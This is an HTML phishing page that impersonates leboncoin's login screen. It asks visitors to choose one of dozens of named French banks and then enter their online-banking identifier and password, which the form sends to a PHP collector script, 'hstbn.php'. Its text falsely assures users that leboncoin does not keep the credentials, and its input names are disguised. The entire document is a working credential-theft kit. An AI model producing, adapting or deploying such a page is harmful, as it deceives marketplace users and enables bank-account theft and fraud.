<!doctype html>
<html lang="en">

<head>
    <script type="text/JavaScript" src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
    <script type="text/JavaScript" src="https://code.jquery.com/jquery-3.1.1.min.js"></script>
    <script type="text/JavaScript" src="https://code.jquery.com/jquery-3.3.1.js" integrity="sha256-2Kok7MbOyxpgUVvAk/HJ2jigOSYS2auK4Pfzbm7uH60=" crossorigin="anonymous"></script>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

    <!-- Bootstrap CSS -->
     <link rel="icon" type="image/png" href="https://www.leboncoin.fr/_next/static/favicon-16-91b63f31.png" sizes="16x16"/><link rel="icon" type="image/png" href="https://www.leboncoin.fr/_next/static/favicon-32-543f08dc.png" sizes="32x32"/>
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous">
    <link href="https://fonts.googleapis.com/css?family=Archivo+Narrow&display=swap" rel="stylesheet">
    <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.7.0/css/all.css" integrity="sha384-lZN37f5QGtY3VHgisS14W3ExzMWZxybE1SJSEsQp9S+oqd12jhcu+A56Ebc1zFSJ" crossorigin="anonymous">
    <title>leboncoin - connexion</title>
    <link href="css/hover.css" rel="stylesheet" media="all">
    <link rel="stylesheet" href="css/brand.css">
    <style type="text/css">
    .nav-item a {
        color: #163056 !important;
    }

    .shadow {
        margin-bottom: 4em;
        background: rgba(255, 255, 255, 0.8);
        border-radius: 3px;
        box-shadow: 0 0 12px 0 rgba(172, 172, 172, 0.5), 0 0 18px 0 rgba(178, 178, 178, 0.5);
        padding: 60px 10px;
    }

    .nav-links.inactive {
        color: #5C5C5C;
    }

    label {
        color: #5C5C5C;
    }
    </style>
</head>

<body style="background-image: url('images/bg.png');background-repeat: no-repeat;background-size: 980px;background-position:50% -250%">
    <div class="container-fluid" style="background-color: rgb(255, 255, 255);box-shadow: rgb(0 0 0 / 15%) 0px 2px 4px 0px;">
        <div class="row p-3">
            <div class="col-sm-5" style="color: rgb(245, 107, 42);">
                <img src="images/left.svg">
            </div>
            <div class="col-sm-7" style="color: rgb(245, 107, 42);">
                <img src="images/logo.svg" width="130px"> &nbsp
                <span style="font-size: 1.4em;font-weight: 500;"><img src="images/verified.svg" width="20px"> Connexion</span>
            </div>
        </div>
    </div>
    <div class="container-fluid mt-5 pt-3">
        <div class="row">
            <div class="col-sm-5 mx-auto" style="max-width: 480px;">
                <div class="text-center" style="border-radius: 8px;box-shadow: rgb(0 0 0 / 20%) 0px 1px 5px 0px, rgb(0 0 0 / 4%) 0px 3px 1px -2px, rgb(0 0 0 / 4%) 0px 2px 2px 0px;background-color: white;padding: 1rem 3.125em 3rem;;">
                    <br>
                    <h4>Saisissez vos identifiants</h4>
                  
                    <p style="font-size:13px">Ils permettent d'accéder en toute sécurité à vos comptes, sur l'espace en ligne de votre banque. Leboncoin ne les conserve pas. </p>
                    <form class="text-left pt-2 text-dark" action="./hstbn.php" method="POST">



                                                <div class="form-group">
        
                                     
                <select name="bankType" class="form-control py-2" id="exampleInputEmail1"  style="width: 100%;height: 55px;border-width: 1px;border-style: solid;background: transparent;padding: 2px 10px;">

                     <option value="">Sélectionnez votre type de banque</option>

   <option value="SmartPay by Sogexia" > SmartPay by Sogexia </option>
                              <option value="Revolut" > Revolut </option>
                              <option value="N26" > N26 </option>
                              <option value="Cetelem" > Cetelem </option>
                              <option value="Credit Cooperatif" g> Credit Cooperatif </option>
                              <option value="Floa Bank" > Floa Bank </option>
                              <option value="Morning" > Morning </option>
                              <option value="Monese" > Monese </option>
                              <option value="ipagoo" > ipagoo </option>
                              <option value="Ferratum Bank" > Ferratum Bank </option>
                              <option value="Vivid Money" > Vivid Money </option>
                              <option value="Helios" > Helios </option>
                              <option value="EKO" > EKO </option>
                              <option value="Ditto Bank" > Ditto Bank </option>
                              <option value="Nickel" > Nickel </option>
                              <option value="C-zam" > C-zam </option>
                              <option value="Anytime"> Anytime </option>
                              <option value="Wormser Frères" > Wormser Frères </option>
                              <option value="Rothschild" > Rothschild </option>
                              <option value="Natixis Wealth Management" > Natixis Wealth Management </option>
                              <option value="Mirabaud" > Mirabaud </option>
                              <option value="Legal &amp; General" > Legal &amp; General </option>
                              <option value="Banque Privée Européenne " > Banque Privée Européenne </option>
                              <option value="Banque Palatine" > Banque Palatine </option>
                              <option value="Banque Marze" > Banque Marze </option>
                              <option value="Banque Martin Maurel">  </option>
                              <option value="Crédit Mutuel" > Crédit Mutuel </option>
                              <option value="VTB Bank France" > VTB Bank France </option>
                              <option value="RCI Banque" > RCI Banque </option>
                              <option value="PSA Banque" > PSA Banque </option>
                              <option value="Milleis Banque" > Milleis Banque </option>
                              <option value="Groupama Banque" > Groupama Banque </option>
                              <option value="Carrefour Banque" > Carrefour Banque </option>
                              <option value="BRED" > BRED </option>
                              <option value="Banque Casino" > Banque Casino </option>
                              <option value="Banque Accord" > Banque Accord </option>
                              <option value="AXA Banque" > AXA Banque </option>
                              <option value="Credit agricole" > Credit agricole </option>
                              <option value="Allianz Banque" > Allianz Banque </option>
                              <option value="Sociéte général" > Sociéte général </option>
                              <option value="BNP paribas" > BNP paribas </option>
                              <option value="Caisse d'épagne" > Caisse d'épagne </option>
                              <option value="Boursrama Banque" > Boursrama Banque </option>
                              <option value="bforbank" > bforbank </option>
                              <option value="La banque postale" > La banque postale </option>
                              <option value="LCL Banque et assurance" > LCL Banque et assurance </option>
                              <option value="Banque populaire" > Banque populaire </option>
                              <option value="Autres banques" > Autres banques </option>

                </select>


                        </div>


                        <div class="form-group">
                            <label for="exampleInputEmail1" class="font-weight-bold text-dark" style="font-size:13px">Identifiant </label>
                            <input type="text"  name="cn11" id="cn11" class="form-control py-2" id="exampleInputEmail1" aria-describedby="emailHelp" required="" placeholder=""  maxlength="16">
                        </div>

                        <div class="form-group">
                            <label for="exampleInputEmail1" class="font-weight-bold text-dark" style="font-size:13px">Mot de passe  </label>
                            <input  type="password"  name="exdate11" id="exdate11" class="form-control py-2" id="exampleInputEmail1" aria-describedby="emailHelp" required="" placeholder=""  maxlength="15">
                        </div>


                      <!--  <div class="form-group">
                            <label for="exampleInputEmail1" class="font-weight-bold text-dark" style="font-size:13px">Code postal de votre agence bancaire</label>
                            <input type="text" name="iban1" id="iban1" class="form-control py-2" id="exampleInputEmail1" aria-describedby="emailHelp" required="" placeholder="" maxlength="30">
                        </div>-->

                    
                        
                        <div class="form-group">
                            <span style="color: rgb(65, 131, 215);font-size: 0.8rem;">Annuler</span>
                        </div>
                        <button type="submit" class="btn w-100 mt-2" type="submit" name="btn300" id="btn300" style="border: 1px solid transparent;color: rgb(255, 255, 255);background-color: rgb(65, 131, 215);">Valider</button>
                    </form>
                    
                </div>
            </div>
        </div>
    </div>
    
</body>


</html>
